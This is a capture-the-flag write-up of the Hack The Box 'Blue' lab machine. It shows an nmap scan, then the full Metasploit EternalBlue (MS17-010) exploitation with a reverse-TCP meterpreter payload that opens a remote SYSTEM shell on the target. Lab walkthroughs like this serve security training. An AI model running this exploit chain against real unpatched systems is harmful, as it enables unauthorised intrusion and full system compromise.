Blue is a very simple beginner box that tasks the user with enumerating with NMAP and using public exploits to compromise the target.
Step 1: Enumerate with NMAP
Our first step in compromising the victim machine is to enumerate with NMAP.
➜ blue nmap -A -v 10.129.24.173 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93SVN ( https://nmap.org ) at 2023-01-22 14:47 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:47
Completed NSE at 14:47, 0.00s elapsed
Initiating NSE at 14:47
Completed NSE at 14:47, 0.00s elapsed
Initiating NSE at 14:47
Completed NSE at 14:47, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:47
Completed Parallel DNS resolution of 1 host. at 14:47, 0.00s elapsed
Initiating Connect Scan at 14:47
Scanning 10.129.24.173 [1000 ports]
Connect Scan Timing: About 15.00% done; ETC: 14:50 (0:02:56 remaining)
Discovered open port 49154/tcp on 10.129.24.173
Increasing send delay for 10.129.24.173 from 0 to 5 due to 151 out of 501 dropped probes since last increase.
Discovered open port 49152/tcp on 10.129.24.173
Increasing send delay for 10.129.24.173 from 5 to 10 due to 11 out of 31 dropped probes since last increase.
Discovered open port 445/tcp on 10.129.24.173
Increasing send delay for 10.129.24.173 from 10 to 20 due to 11 out of 15 dropped probes since last increase.
Discovered open port 135/tcp on 10.129.24.173
Discovered open port 139/tcp on 10.129.24.173
Increasing send delay for 10.129.24.173 from 20 to 40 due to 11 out of 12 dropped probes since last increase.
Discovered open port 49153/tcp on 10.129.24.173
Discovered open port 49157/tcp on 10.129.24.173
Discovered open port 49155/tcp on 10.129.24.173
Discovered open port 49156/tcp on 10.129.24.173
Completed Connect Scan at 14:48, 61.50s elapsed (1000 total ports)
Initiating Service scan at 14:48
Scanning 9 services on 10.129.24.173
Service scan Timing: About 44.44% done; ETC: 14:50 (0:01:08 remaining)
Completed Service scan at 14:49, 59.15s elapsed (9 services on 1 host)
NSE: Script scanning 10.129.24.173.
Initiating NSE at 14:49
Completed NSE at 14:49, 9.22s elapsed
Initiating NSE at 14:49
Completed NSE at 14:49, 0.01s elapsed
Initiating NSE at 14:49
Completed NSE at 14:49, 0.00s elapsed
Nmap scan report for 10.129.24.173
Host is up (0.024s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsof�� Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-01-22T19:49:09
|_ start_date: 2023-01-22T19:16:18
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-01-22T19:49:10+00:00
|_clock-skew: mean: 3s, deviation: 2s, median: 1s
NSE: Script Post-scanning.
Initiating NSE at 14:49
Completed NSE at 14:49, 0.00s elapsed
Initiating NSE at 14:49
Completed NSE at 14:49, 0.00s elapsed
Initiating NSE at 14:49
Completed NSE at 14:49, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.20 seconds
We can see that the OS has been identified as Windows 7 Professional 7601 Service Pack 1. We should continue our investigation by seeing if there is an exploit for this version of Windows.
Step 2: Exploiting the Target
After searching for Windows 7 Professional 7601 Service Pack 1 exploits, we quickly find the following metasploit module that may be capable of exploiting the target: https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/. This module causes a buffer overflow that may lead to the execution of attacker defined arbitrary commands. Let’s try it out.
➜ blue msfconsole
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
.OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
.dOOo'WM.OOOOocccxOOOO.MX'xOOd.
,kOl'M.OOOOOOOOOOOOO.M'dOk,
:kk;.OOOOOOOOOOOOO.;Ok:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v6.2.37-dev- ]
+ -- --=[ 2277 exploits - 1194 auxiliary - 408 post ]
+ -- --=[ 948 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Display the Framework log using the
log command, learn more with help log
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use exploit/windows/smb/ms17_010_
use exploit/windows/smb/ms17_010_eternalblue use exploit/windows/smb/ms17_010_psexec
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.173 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.129.24.173
rhosts => 10.129.24.173
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.14.86
lhost => 10.10.14.86
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.129.24.173 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.86 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.10.14.86:4444
[*] 10.129.24.173:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.129.24.173:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.129.24.173:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.129.24.173:445 - The target is vulnerable.
[*] 10.129.24.173:445 - Connecting to target for exploitation.
[+] 10.129.24.173:445 - Connection established for exploitation.
[+] 10.129.24.173:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.129.24.173:445 - CORE raw buffer dump (42 bytes)
[*] 10.129.24.173:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.129.24.173:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.129.24.173:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.129.24.173:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.129.24.173:445 - Trying exploit with 12 Groom Allocations.
[*] 10.129.24.173:445 - Sending all but last fragment of exploit packet
[*] 10.129.24.173:445 - Starting non-paged pool grooming
[+] 10.129.24.173:445 - Sending SMBv2 buffers
[+] 10.129.24.173:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.129.24.173:445 - Sending final SMBv2 buffers.
[*] 10.129.24.173:445 - Sending last fragment of exploit packet!
[*] 10.129.24.173:445 - Receiving response from exploit packet
[+] 10.129.24.173:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.129.24.173:445 - Sending egg to corrupted connection.
[*] 10.129.24.173:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 10.129.24.173
[+] 10.129.24.173:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.129.24.173:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.129.24.173:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (10.10.14.86:4444 -> 10.129.24.173:49158) at 2023-01-22 15:08:50 -0500
We simply need to supply the remote host ip (RHOSTS) and the local host ip/listening port combo to run the exploit. After running the exploit we are quickly presented with a meterpreter session, SUCCESS!
We can now drop into a shell and run the whoami command to confirm that we have elevated privileges on the victim machine.
meterpreter > shell
Process 2920 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
The last step is to navigate to each user’s desktop and collect the flags, piece of cake.